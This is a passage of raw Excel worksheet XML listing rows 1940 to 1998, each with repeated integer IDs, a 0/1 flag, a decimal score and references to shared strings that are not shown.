        <v>479</v>
      </c>
      <c r="D1940">
        <v>0</v>
      </c>
      <c r="E1940">
        <v>0.87199997901916504</v>
      </c>
      <c r="F1940" t="s">
        <v>7</v>
      </c>
      <c r="G1940" t="s">
        <v>3828</v>
      </c>
      <c r="H1940" t="s">
        <v>3829</v>
      </c>
    </row>
    <row r="1941" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1941" s="1">
        <v>1939</v>
      </c>
      <c r="B1941">
        <v>7714</v>
      </c>
      <c r="C1941">
        <v>7714</v>
      </c>
      <c r="D1941">
        <v>0</v>
      </c>
      <c r="E1941">
        <v>0.9617999792098999</v>
      </c>
      <c r="F1941" t="s">
        <v>7</v>
      </c>
      <c r="G1941" t="s">
        <v>3830</v>
      </c>
      <c r="H1941" t="s">
        <v>3831</v>
      </c>
    </row>
    <row r="1942" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1942" s="1">
        <v>1940</v>
      </c>
      <c r="B1942">
        <v>7716</v>
      </c>
      <c r="C1942">
        <v>7716</v>
      </c>
      <c r="D1942">
        <v>0</v>
      </c>
      <c r="E1942">
        <v>0.69290000200271606</v>
      </c>
      <c r="F1942" t="s">
        <v>7</v>
      </c>
      <c r="G1942" t="s">
        <v>3832</v>
      </c>
      <c r="H1942" t="s">
        <v>3833</v>
      </c>
    </row>
    <row r="1943" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1943" s="1">
        <v>1941</v>
      </c>
      <c r="B1943">
        <v>4972</v>
      </c>
      <c r="C1943">
        <v>4972</v>
      </c>
      <c r="D1943">
        <v>0</v>
      </c>
      <c r="E1943">
        <v>0.61330002546310425</v>
      </c>
      <c r="F1943" t="s">
        <v>7</v>
      </c>
      <c r="G1943" t="s">
        <v>3834</v>
      </c>
      <c r="H1943" t="s">
        <v>3835</v>
      </c>
    </row>
    <row r="1944" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1944" s="1">
        <v>1942</v>
      </c>
      <c r="B1944">
        <v>7783</v>
      </c>
      <c r="C1944">
        <v>7783</v>
      </c>
      <c r="D1944">
        <v>0</v>
      </c>
      <c r="E1944">
        <v>0.7060999870300293</v>
      </c>
      <c r="F1944" t="s">
        <v>7</v>
      </c>
      <c r="G1944" t="s">
        <v>3836</v>
      </c>
      <c r="H1944" t="s">
        <v>3837</v>
      </c>
    </row>
    <row r="1945" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1945" s="1">
        <v>1943</v>
      </c>
      <c r="B1945">
        <v>5587</v>
      </c>
      <c r="C1945">
        <v>5587</v>
      </c>
      <c r="D1945">
        <v>0</v>
      </c>
      <c r="E1945">
        <v>0.55239999294281006</v>
      </c>
      <c r="F1945" t="s">
        <v>7</v>
      </c>
      <c r="G1945" t="s">
        <v>3838</v>
      </c>
      <c r="H1945" t="s">
        <v>3839</v>
      </c>
    </row>
    <row r="1946" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1946" s="1">
        <v>1944</v>
      </c>
      <c r="B1946">
        <v>319</v>
      </c>
      <c r="C1946">
        <v>319</v>
      </c>
      <c r="D1946">
        <v>0</v>
      </c>
      <c r="E1946">
        <v>0.99220001697540283</v>
      </c>
      <c r="F1946" t="s">
        <v>7</v>
      </c>
      <c r="G1946" t="s">
        <v>3840</v>
      </c>
      <c r="H1946" t="s">
        <v>3841</v>
      </c>
    </row>
    <row r="1947" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1947" s="1">
        <v>1945</v>
      </c>
      <c r="B1947">
        <v>5705</v>
      </c>
      <c r="C1947">
        <v>5705</v>
      </c>
      <c r="D1947">
        <v>0</v>
      </c>
      <c r="E1947">
        <v>0.99150002002716064</v>
      </c>
      <c r="F1947" t="s">
        <v>7</v>
      </c>
      <c r="G1947" t="s">
        <v>3842</v>
      </c>
      <c r="H1947" t="s">
        <v>3843</v>
      </c>
    </row>
    <row r="1948" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1948" s="1">
        <v>1946</v>
      </c>
      <c r="B1948">
        <v>476</v>
      </c>
      <c r="C1948">
        <v>476</v>
      </c>
      <c r="D1948">
        <v>0</v>
      </c>
      <c r="E1948">
        <v>0.7994999885559082</v>
      </c>
      <c r="F1948" t="s">
        <v>7</v>
      </c>
      <c r="G1948" t="s">
        <v>3844</v>
      </c>
      <c r="H1948" t="s">
        <v>3845</v>
      </c>
    </row>
    <row r="1949" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1949" s="1">
        <v>1947</v>
      </c>
      <c r="B1949">
        <v>7705</v>
      </c>
      <c r="C1949">
        <v>7705</v>
      </c>
      <c r="D1949">
        <v>0</v>
      </c>
      <c r="E1949">
        <v>0.72939997911453247</v>
      </c>
      <c r="F1949" t="s">
        <v>7</v>
      </c>
      <c r="G1949" t="s">
        <v>3846</v>
      </c>
      <c r="H1949" t="s">
        <v>3847</v>
      </c>
    </row>
    <row r="1950" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1950" s="1">
        <v>1948</v>
      </c>
      <c r="B1950">
        <v>320</v>
      </c>
      <c r="C1950">
        <v>320</v>
      </c>
      <c r="D1950">
        <v>0</v>
      </c>
      <c r="E1950">
        <v>0.98989999294281006</v>
      </c>
      <c r="F1950" t="s">
        <v>7</v>
      </c>
      <c r="G1950" t="s">
        <v>3848</v>
      </c>
      <c r="H1950" t="s">
        <v>3849</v>
      </c>
    </row>
    <row r="1951" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1951" s="1">
        <v>1949</v>
      </c>
      <c r="B1951">
        <v>474</v>
      </c>
      <c r="C1951">
        <v>474</v>
      </c>
      <c r="D1951">
        <v>0</v>
      </c>
      <c r="E1951">
        <v>0.9976000189781189</v>
      </c>
      <c r="F1951" t="s">
        <v>7</v>
      </c>
      <c r="G1951" t="s">
        <v>3850</v>
      </c>
      <c r="H1951" t="s">
        <v>3851</v>
      </c>
    </row>
    <row r="1952" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1952" s="1">
        <v>1950</v>
      </c>
      <c r="B1952">
        <v>1100</v>
      </c>
      <c r="C1952">
        <v>1100</v>
      </c>
      <c r="D1952">
        <v>0</v>
      </c>
      <c r="E1952">
        <v>0.92199999094009399</v>
      </c>
      <c r="F1952" t="s">
        <v>7</v>
      </c>
      <c r="G1952" t="s">
        <v>3852</v>
      </c>
      <c r="H1952" t="s">
        <v>3853</v>
      </c>
    </row>
    <row r="1953" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1953" s="1">
        <v>1951</v>
      </c>
      <c r="B1953">
        <v>7779</v>
      </c>
      <c r="C1953">
        <v>7779</v>
      </c>
      <c r="D1953">
        <v>0</v>
      </c>
      <c r="E1953">
        <v>0.65570002794265747</v>
      </c>
      <c r="F1953" t="s">
        <v>7</v>
      </c>
      <c r="G1953" t="s">
        <v>3854</v>
      </c>
      <c r="H1953" t="s">
        <v>3855</v>
      </c>
    </row>
    <row r="1954" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1954" s="1">
        <v>1952</v>
      </c>
      <c r="B1954">
        <v>7408</v>
      </c>
      <c r="C1954">
        <v>7408</v>
      </c>
      <c r="D1954">
        <v>0</v>
      </c>
      <c r="E1954">
        <v>0.86220002174377441</v>
      </c>
      <c r="F1954" t="s">
        <v>7</v>
      </c>
      <c r="G1954" t="s">
        <v>3856</v>
      </c>
      <c r="H1954" t="s">
        <v>3857</v>
      </c>
    </row>
    <row r="1955" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1955" s="1">
        <v>1953</v>
      </c>
      <c r="B1955">
        <v>5708</v>
      </c>
      <c r="C1955">
        <v>5708</v>
      </c>
      <c r="D1955">
        <v>0</v>
      </c>
      <c r="E1955">
        <v>0.51840001344680786</v>
      </c>
      <c r="F1955" t="s">
        <v>7</v>
      </c>
      <c r="G1955" t="s">
        <v>3858</v>
      </c>
      <c r="H1955" t="s">
        <v>3859</v>
      </c>
    </row>
    <row r="1956" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1956" s="1">
        <v>1954</v>
      </c>
      <c r="B1956">
        <v>1096</v>
      </c>
      <c r="C1956">
        <v>1096</v>
      </c>
      <c r="D1956">
        <v>0</v>
      </c>
      <c r="E1956">
        <v>0.63899999856948853</v>
      </c>
      <c r="F1956" t="s">
        <v>7</v>
      </c>
      <c r="G1956" t="s">
        <v>3860</v>
      </c>
      <c r="H1956" t="s">
        <v>3861</v>
      </c>
    </row>
    <row r="1957" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1957" s="1">
        <v>1955</v>
      </c>
      <c r="B1957">
        <v>4983</v>
      </c>
      <c r="C1957">
        <v>4983</v>
      </c>
      <c r="D1957">
        <v>0</v>
      </c>
      <c r="E1957">
        <v>0.85189998149871826</v>
      </c>
      <c r="F1957" t="s">
        <v>7</v>
      </c>
      <c r="G1957" t="s">
        <v>3862</v>
      </c>
      <c r="H1957" t="s">
        <v>3863</v>
      </c>
    </row>
    <row r="1958" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1958" s="1">
        <v>1956</v>
      </c>
      <c r="B1958">
        <v>1109</v>
      </c>
      <c r="C1958">
        <v>1109</v>
      </c>
      <c r="D1958">
        <v>0</v>
      </c>
      <c r="E1958">
        <v>0.82179999351501465</v>
      </c>
      <c r="F1958" t="s">
        <v>7</v>
      </c>
      <c r="G1958" t="s">
        <v>3864</v>
      </c>
      <c r="H1958" t="s">
        <v>3753</v>
      </c>
    </row>
    <row r="1959" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1959" s="1">
        <v>1957</v>
      </c>
      <c r="B1959">
        <v>468</v>
      </c>
      <c r="C1959">
        <v>468</v>
      </c>
      <c r="D1959">
        <v>0</v>
      </c>
      <c r="E1959">
        <v>0.99320000410079956</v>
      </c>
      <c r="F1959" t="s">
        <v>7</v>
      </c>
      <c r="G1959" t="s">
        <v>3865</v>
      </c>
      <c r="H1959" t="s">
        <v>3866</v>
      </c>
    </row>
    <row r="1960" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1960" s="1">
        <v>1958</v>
      </c>
      <c r="B1960">
        <v>469</v>
      </c>
      <c r="C1960">
        <v>469</v>
      </c>
      <c r="D1960">
        <v>0</v>
      </c>
      <c r="E1960">
        <v>0.54720002412796021</v>
      </c>
      <c r="F1960" t="s">
        <v>7</v>
      </c>
      <c r="G1960" t="s">
        <v>3867</v>
      </c>
      <c r="H1960" t="s">
        <v>3868</v>
      </c>
    </row>
    <row r="1961" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1961" s="1">
        <v>1959</v>
      </c>
      <c r="B1961">
        <v>7776</v>
      </c>
      <c r="C1961">
        <v>7776</v>
      </c>
      <c r="D1961">
        <v>0</v>
      </c>
      <c r="E1961">
        <v>0.9878000020980835</v>
      </c>
      <c r="F1961" t="s">
        <v>7</v>
      </c>
      <c r="G1961" t="s">
        <v>3869</v>
      </c>
      <c r="H1961" t="s">
        <v>3870</v>
      </c>
    </row>
    <row r="1962" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1962" s="1">
        <v>1960</v>
      </c>
      <c r="B1962">
        <v>1125</v>
      </c>
      <c r="C1962">
        <v>1125</v>
      </c>
      <c r="D1962">
        <v>0</v>
      </c>
      <c r="E1962">
        <v>0.64999997615814209</v>
      </c>
      <c r="F1962" t="s">
        <v>7</v>
      </c>
      <c r="G1962" t="s">
        <v>3871</v>
      </c>
      <c r="H1962" t="s">
        <v>3872</v>
      </c>
    </row>
    <row r="1963" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1963" s="1">
        <v>1961</v>
      </c>
      <c r="B1963">
        <v>1126</v>
      </c>
      <c r="C1963">
        <v>1126</v>
      </c>
      <c r="D1963">
        <v>0</v>
      </c>
      <c r="E1963">
        <v>0.74190002679824829</v>
      </c>
      <c r="F1963" t="s">
        <v>7</v>
      </c>
      <c r="G1963" t="s">
        <v>3873</v>
      </c>
      <c r="H1963" t="s">
        <v>3874</v>
      </c>
    </row>
    <row r="1964" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1964" s="1">
        <v>1962</v>
      </c>
      <c r="B1964">
        <v>330</v>
      </c>
      <c r="C1964">
        <v>330</v>
      </c>
      <c r="D1964">
        <v>0</v>
      </c>
      <c r="E1964">
        <v>0.63120001554489136</v>
      </c>
      <c r="F1964" t="s">
        <v>7</v>
      </c>
      <c r="G1964" t="s">
        <v>3875</v>
      </c>
      <c r="H1964" t="s">
        <v>3876</v>
      </c>
    </row>
    <row r="1965" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1965" s="1">
        <v>1963</v>
      </c>
      <c r="B1965">
        <v>1131</v>
      </c>
      <c r="C1965">
        <v>1131</v>
      </c>
      <c r="D1965">
        <v>0</v>
      </c>
      <c r="E1965">
        <v>0.99459999799728394</v>
      </c>
      <c r="F1965" t="s">
        <v>7</v>
      </c>
      <c r="G1965" t="s">
        <v>3877</v>
      </c>
      <c r="H1965" t="s">
        <v>3878</v>
      </c>
    </row>
    <row r="1966" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1966" s="1">
        <v>1964</v>
      </c>
      <c r="B1966">
        <v>1132</v>
      </c>
      <c r="C1966">
        <v>1132</v>
      </c>
      <c r="D1966">
        <v>0</v>
      </c>
      <c r="E1966">
        <v>0.99779999256134033</v>
      </c>
      <c r="F1966" t="s">
        <v>7</v>
      </c>
      <c r="G1966" t="s">
        <v>3879</v>
      </c>
      <c r="H1966" t="s">
        <v>983</v>
      </c>
    </row>
    <row r="1967" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1967" s="1">
        <v>1965</v>
      </c>
      <c r="B1967">
        <v>1128</v>
      </c>
      <c r="C1967">
        <v>1128</v>
      </c>
      <c r="D1967">
        <v>0</v>
      </c>
      <c r="E1967">
        <v>0.72289997339248657</v>
      </c>
      <c r="F1967" t="s">
        <v>7</v>
      </c>
      <c r="G1967" t="s">
        <v>3880</v>
      </c>
      <c r="H1967" t="s">
        <v>3881</v>
      </c>
    </row>
    <row r="1968" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1968" s="1">
        <v>1966</v>
      </c>
      <c r="B1968">
        <v>1063</v>
      </c>
      <c r="C1968">
        <v>1063</v>
      </c>
      <c r="D1968">
        <v>0</v>
      </c>
      <c r="E1968">
        <v>0.99709999561309814</v>
      </c>
      <c r="F1968" t="s">
        <v>7</v>
      </c>
      <c r="G1968" t="s">
        <v>3882</v>
      </c>
      <c r="H1968" t="s">
        <v>3883</v>
      </c>
    </row>
    <row r="1969" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1969" s="1">
        <v>1967</v>
      </c>
      <c r="B1969">
        <v>7399</v>
      </c>
      <c r="C1969">
        <v>7399</v>
      </c>
      <c r="D1969">
        <v>0</v>
      </c>
      <c r="E1969">
        <v>0.91360002756118774</v>
      </c>
      <c r="F1969" t="s">
        <v>7</v>
      </c>
      <c r="G1969" t="s">
        <v>3884</v>
      </c>
      <c r="H1969" t="s">
        <v>3885</v>
      </c>
    </row>
    <row r="1970" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1970" s="1">
        <v>1968</v>
      </c>
      <c r="B1970">
        <v>73</v>
      </c>
      <c r="C1970">
        <v>73</v>
      </c>
      <c r="D1970">
        <v>0</v>
      </c>
      <c r="E1970">
        <v>0.84369999170303345</v>
      </c>
      <c r="F1970" t="s">
        <v>7</v>
      </c>
      <c r="G1970" t="s">
        <v>3886</v>
      </c>
      <c r="H1970" t="s">
        <v>3887</v>
      </c>
    </row>
    <row r="1971" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1971" s="1">
        <v>1969</v>
      </c>
      <c r="B1971">
        <v>1064</v>
      </c>
      <c r="C1971">
        <v>1064</v>
      </c>
      <c r="D1971">
        <v>0</v>
      </c>
      <c r="E1971">
        <v>0.95260000228881836</v>
      </c>
      <c r="F1971" t="s">
        <v>7</v>
      </c>
      <c r="G1971" t="s">
        <v>3888</v>
      </c>
      <c r="H1971" t="s">
        <v>3889</v>
      </c>
    </row>
    <row r="1972" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1972" s="1">
        <v>1970</v>
      </c>
      <c r="B1972">
        <v>1070</v>
      </c>
      <c r="C1972">
        <v>1070</v>
      </c>
      <c r="D1972">
        <v>0</v>
      </c>
      <c r="E1972">
        <v>0.99709999561309814</v>
      </c>
      <c r="F1972" t="s">
        <v>7</v>
      </c>
      <c r="G1972" t="s">
        <v>3890</v>
      </c>
      <c r="H1972" t="s">
        <v>3883</v>
      </c>
    </row>
    <row r="1973" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1973" s="1">
        <v>1971</v>
      </c>
      <c r="B1973">
        <v>1069</v>
      </c>
      <c r="C1973">
        <v>1069</v>
      </c>
      <c r="D1973">
        <v>0</v>
      </c>
      <c r="E1973">
        <v>0.98420000076293945</v>
      </c>
      <c r="F1973" t="s">
        <v>7</v>
      </c>
      <c r="G1973" t="s">
        <v>3891</v>
      </c>
      <c r="H1973" t="s">
        <v>3892</v>
      </c>
    </row>
    <row r="1974" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1974" s="1">
        <v>1972</v>
      </c>
      <c r="B1974">
        <v>1065</v>
      </c>
      <c r="C1974">
        <v>1065</v>
      </c>
      <c r="D1974">
        <v>0</v>
      </c>
      <c r="E1974">
        <v>0.99750000238418579</v>
      </c>
      <c r="F1974" t="s">
        <v>7</v>
      </c>
      <c r="G1974" t="s">
        <v>3893</v>
      </c>
      <c r="H1974" t="s">
        <v>1379</v>
      </c>
    </row>
    <row r="1975" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1975" s="1">
        <v>1973</v>
      </c>
      <c r="B1975">
        <v>1066</v>
      </c>
      <c r="C1975">
        <v>1066</v>
      </c>
      <c r="D1975">
        <v>0</v>
      </c>
      <c r="E1975">
        <v>0.99750000238418579</v>
      </c>
      <c r="F1975" t="s">
        <v>7</v>
      </c>
      <c r="G1975" t="s">
        <v>3894</v>
      </c>
      <c r="H1975" t="s">
        <v>1379</v>
      </c>
    </row>
    <row r="1976" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1976" s="1">
        <v>1974</v>
      </c>
      <c r="B1976">
        <v>1068</v>
      </c>
      <c r="C1976">
        <v>1068</v>
      </c>
      <c r="D1976">
        <v>0</v>
      </c>
      <c r="E1976">
        <v>0.99860000610351563</v>
      </c>
      <c r="F1976" t="s">
        <v>7</v>
      </c>
      <c r="G1976" t="s">
        <v>3895</v>
      </c>
      <c r="H1976" t="s">
        <v>3896</v>
      </c>
    </row>
    <row r="1977" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1977" s="1">
        <v>1975</v>
      </c>
      <c r="B1977">
        <v>4984</v>
      </c>
      <c r="C1977">
        <v>4984</v>
      </c>
      <c r="D1977">
        <v>0</v>
      </c>
      <c r="E1977">
        <v>0.43650001287460333</v>
      </c>
      <c r="F1977" t="s">
        <v>7</v>
      </c>
      <c r="G1977" t="s">
        <v>3897</v>
      </c>
      <c r="H1977" t="s">
        <v>3898</v>
      </c>
    </row>
    <row r="1978" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1978" s="1">
        <v>1976</v>
      </c>
      <c r="B1978">
        <v>4962</v>
      </c>
      <c r="C1978">
        <v>4962</v>
      </c>
      <c r="D1978">
        <v>0</v>
      </c>
      <c r="E1978">
        <v>0.99809998273849487</v>
      </c>
      <c r="F1978" t="s">
        <v>7</v>
      </c>
      <c r="G1978" t="s">
        <v>3899</v>
      </c>
      <c r="H1978" t="s">
        <v>3900</v>
      </c>
    </row>
    <row r="1979" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1979" s="1">
        <v>1977</v>
      </c>
      <c r="B1979">
        <v>1062</v>
      </c>
      <c r="C1979">
        <v>1062</v>
      </c>
      <c r="D1979">
        <v>0</v>
      </c>
      <c r="E1979">
        <v>0.98940002918243408</v>
      </c>
      <c r="F1979" t="s">
        <v>7</v>
      </c>
      <c r="G1979" t="s">
        <v>3901</v>
      </c>
      <c r="H1979" t="s">
        <v>3902</v>
      </c>
    </row>
    <row r="1980" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1980" s="1">
        <v>1978</v>
      </c>
      <c r="B1980">
        <v>1067</v>
      </c>
      <c r="C1980">
        <v>1067</v>
      </c>
      <c r="D1980">
        <v>0</v>
      </c>
      <c r="E1980">
        <v>0.99889999628067017</v>
      </c>
      <c r="F1980" t="s">
        <v>7</v>
      </c>
      <c r="G1980" t="s">
        <v>3903</v>
      </c>
      <c r="H1980" t="s">
        <v>1879</v>
      </c>
    </row>
    <row r="1981" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1981" s="1">
        <v>1979</v>
      </c>
      <c r="B1981">
        <v>1061</v>
      </c>
      <c r="C1981">
        <v>1061</v>
      </c>
      <c r="D1981">
        <v>0</v>
      </c>
      <c r="E1981">
        <v>0.98869997262954712</v>
      </c>
      <c r="F1981" t="s">
        <v>7</v>
      </c>
      <c r="G1981" t="s">
        <v>3904</v>
      </c>
      <c r="H1981" t="s">
        <v>3905</v>
      </c>
    </row>
    <row r="1982" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1982" s="1">
        <v>1980</v>
      </c>
      <c r="B1982">
        <v>470</v>
      </c>
      <c r="C1982">
        <v>470</v>
      </c>
      <c r="D1982">
        <v>0</v>
      </c>
      <c r="E1982">
        <v>0.53259998559951782</v>
      </c>
      <c r="F1982" t="s">
        <v>7</v>
      </c>
      <c r="G1982" t="s">
        <v>3906</v>
      </c>
      <c r="H1982" t="s">
        <v>3907</v>
      </c>
    </row>
    <row r="1983" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1983" s="1">
        <v>1981</v>
      </c>
      <c r="B1983">
        <v>1134</v>
      </c>
      <c r="C1983">
        <v>1134</v>
      </c>
      <c r="D1983">
        <v>0</v>
      </c>
      <c r="E1983">
        <v>0.76139998435974121</v>
      </c>
      <c r="F1983" t="s">
        <v>7</v>
      </c>
      <c r="G1983" t="s">
        <v>3908</v>
      </c>
      <c r="H1983" t="s">
        <v>3909</v>
      </c>
    </row>
    <row r="1984" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1984" s="1">
        <v>1982</v>
      </c>
      <c r="B1984">
        <v>1071</v>
      </c>
      <c r="C1984">
        <v>1071</v>
      </c>
      <c r="D1984">
        <v>0</v>
      </c>
      <c r="E1984">
        <v>0.99180001020431519</v>
      </c>
      <c r="F1984" t="s">
        <v>7</v>
      </c>
      <c r="G1984" t="s">
        <v>3910</v>
      </c>
      <c r="H1984" t="s">
        <v>2637</v>
      </c>
    </row>
    <row r="1985" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1985" s="1">
        <v>1983</v>
      </c>
      <c r="B1985">
        <v>624</v>
      </c>
      <c r="C1985">
        <v>624</v>
      </c>
      <c r="D1985">
        <v>1</v>
      </c>
      <c r="E1985">
        <v>0.62040001153945923</v>
      </c>
      <c r="F1985" t="s">
        <v>3911</v>
      </c>
      <c r="G1985" t="s">
        <v>3912</v>
      </c>
      <c r="H1985" t="s">
        <v>3913</v>
      </c>
    </row>
    <row r="1986" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1986" s="1">
        <v>1984</v>
      </c>
      <c r="B1986">
        <v>4074</v>
      </c>
      <c r="C1986">
        <v>4074</v>
      </c>
      <c r="D1986">
        <v>1</v>
      </c>
      <c r="E1986">
        <v>0.53159999847412109</v>
      </c>
      <c r="F1986" t="s">
        <v>3911</v>
      </c>
      <c r="G1986" t="s">
        <v>3914</v>
      </c>
      <c r="H1986" t="s">
        <v>3915</v>
      </c>
    </row>
    <row r="1987" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1987" s="1">
        <v>1985</v>
      </c>
      <c r="B1987">
        <v>3976</v>
      </c>
      <c r="C1987">
        <v>3976</v>
      </c>
      <c r="D1987">
        <v>1</v>
      </c>
      <c r="E1987">
        <v>0.99519997835159302</v>
      </c>
      <c r="F1987" t="s">
        <v>3911</v>
      </c>
      <c r="G1987" t="s">
        <v>3916</v>
      </c>
      <c r="H1987" t="s">
        <v>3917</v>
      </c>
    </row>
    <row r="1988" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1988" s="1">
        <v>1986</v>
      </c>
      <c r="B1988">
        <v>5438</v>
      </c>
      <c r="C1988">
        <v>5438</v>
      </c>
      <c r="D1988">
        <v>1</v>
      </c>
      <c r="E1988">
        <v>0.99779999256134033</v>
      </c>
      <c r="F1988" t="s">
        <v>3911</v>
      </c>
      <c r="G1988" t="s">
        <v>3918</v>
      </c>
      <c r="H1988" t="s">
        <v>3919</v>
      </c>
    </row>
    <row r="1989" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1989" s="1">
        <v>1987</v>
      </c>
      <c r="B1989">
        <v>5668</v>
      </c>
      <c r="C1989">
        <v>5668</v>
      </c>
      <c r="D1989">
        <v>1</v>
      </c>
      <c r="E1989">
        <v>0.99739998579025269</v>
      </c>
      <c r="F1989" t="s">
        <v>3911</v>
      </c>
      <c r="G1989" t="s">
        <v>3920</v>
      </c>
      <c r="H1989" t="s">
        <v>3921</v>
      </c>
    </row>
    <row r="1990" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1990" s="1">
        <v>1988</v>
      </c>
      <c r="B1990">
        <v>5712</v>
      </c>
      <c r="C1990">
        <v>5712</v>
      </c>
      <c r="D1990">
        <v>1</v>
      </c>
      <c r="E1990">
        <v>0.99930000305175781</v>
      </c>
      <c r="F1990" t="s">
        <v>3911</v>
      </c>
      <c r="G1990" t="s">
        <v>3922</v>
      </c>
      <c r="H1990" t="s">
        <v>3923</v>
      </c>
    </row>
    <row r="1991" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1991" s="1">
        <v>1989</v>
      </c>
      <c r="B1991">
        <v>4073</v>
      </c>
      <c r="C1991">
        <v>4073</v>
      </c>
      <c r="D1991">
        <v>1</v>
      </c>
      <c r="E1991">
        <v>0.56559997797012329</v>
      </c>
      <c r="F1991" t="s">
        <v>3911</v>
      </c>
      <c r="G1991" t="s">
        <v>3924</v>
      </c>
      <c r="H1991" t="s">
        <v>3925</v>
      </c>
    </row>
    <row r="1992" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1992" s="1">
        <v>1990</v>
      </c>
      <c r="B1992">
        <v>5647</v>
      </c>
      <c r="C1992">
        <v>5647</v>
      </c>
      <c r="D1992">
        <v>1</v>
      </c>
      <c r="E1992">
        <v>0.99739998579025269</v>
      </c>
      <c r="F1992" t="s">
        <v>3911</v>
      </c>
      <c r="G1992" t="s">
        <v>3926</v>
      </c>
      <c r="H1992" t="s">
        <v>3927</v>
      </c>
    </row>
    <row r="1993" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1993" s="1">
        <v>1991</v>
      </c>
      <c r="B1993">
        <v>3247</v>
      </c>
      <c r="C1993">
        <v>3247</v>
      </c>
      <c r="D1993">
        <v>1</v>
      </c>
      <c r="E1993">
        <v>0.99910002946853638</v>
      </c>
      <c r="F1993" t="s">
        <v>3911</v>
      </c>
      <c r="G1993" t="s">
        <v>3928</v>
      </c>
      <c r="H1993" t="s">
        <v>3929</v>
      </c>
    </row>
    <row r="1994" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1994" s="1">
        <v>1992</v>
      </c>
      <c r="B1994">
        <v>4276</v>
      </c>
      <c r="C1994">
        <v>4276</v>
      </c>
      <c r="D1994">
        <v>1</v>
      </c>
      <c r="E1994">
        <v>0.82319998741149902</v>
      </c>
      <c r="F1994" t="s">
        <v>3911</v>
      </c>
      <c r="G1994" t="s">
        <v>3930</v>
      </c>
      <c r="H1994" t="s">
        <v>3931</v>
      </c>
    </row>
    <row r="1995" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1995" s="1">
        <v>1993</v>
      </c>
      <c r="B1995">
        <v>2796</v>
      </c>
      <c r="C1995">
        <v>2796</v>
      </c>
      <c r="D1995">
        <v>1</v>
      </c>
      <c r="E1995">
        <v>0.99159997701644897</v>
      </c>
      <c r="F1995" t="s">
        <v>3911</v>
      </c>
      <c r="G1995" t="s">
        <v>3932</v>
      </c>
      <c r="H1995" t="s">
        <v>3933</v>
      </c>
    </row>
    <row r="1996" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1996" s="1">
        <v>1994</v>
      </c>
      <c r="B1996">
        <v>5651</v>
      </c>
      <c r="C1996">
        <v>5651</v>
      </c>
      <c r="D1996">
        <v>1</v>
      </c>
      <c r="E1996">
        <v>0.9934999942779541</v>
      </c>
      <c r="F1996" t="s">
        <v>3911</v>
      </c>
      <c r="G1996" t="s">
        <v>3934</v>
      </c>
      <c r="H1996" t="s">
        <v>3935</v>
      </c>
    </row>
    <row r="1997" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1997" s="1">
        <v>1995</v>
      </c>
      <c r="B1997">
        <v>2729</v>
      </c>
      <c r="C1997">
        <v>2729</v>
      </c>
      <c r="D1997">
        <v>1</v>
      </c>
      <c r="E1997">
        <v>0.93120002746582031</v>
      </c>
      <c r="F1997" t="s">
        <v>3911</v>
      </c>
      <c r="G1997" t="s">
        <v>3936</v>
      </c>
      <c r="H1997" t="s">
        <v>3937</v>
      </c>
    </row>
    <row r="1998" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1998" s="1">
        <v>1996</v>
      </c>
      <c r="B1998">
        <v>2794</v>
      </c>
      <c r="C1998">
        <v>2794</v>
      </c>
      <c r="D1998">
        <v>1</v>
      </c>
      <c r="E1998">
        <v>0.9944000244140625</v>
      </c>
      <c r="F1998" t="s">
        <v>3911</v>
      </c>
      <c r="G1998" t="s">
        <v>3938</v>
      </c>
      <c r="H1998" t="s">
        <v>3939</v>
      </c>
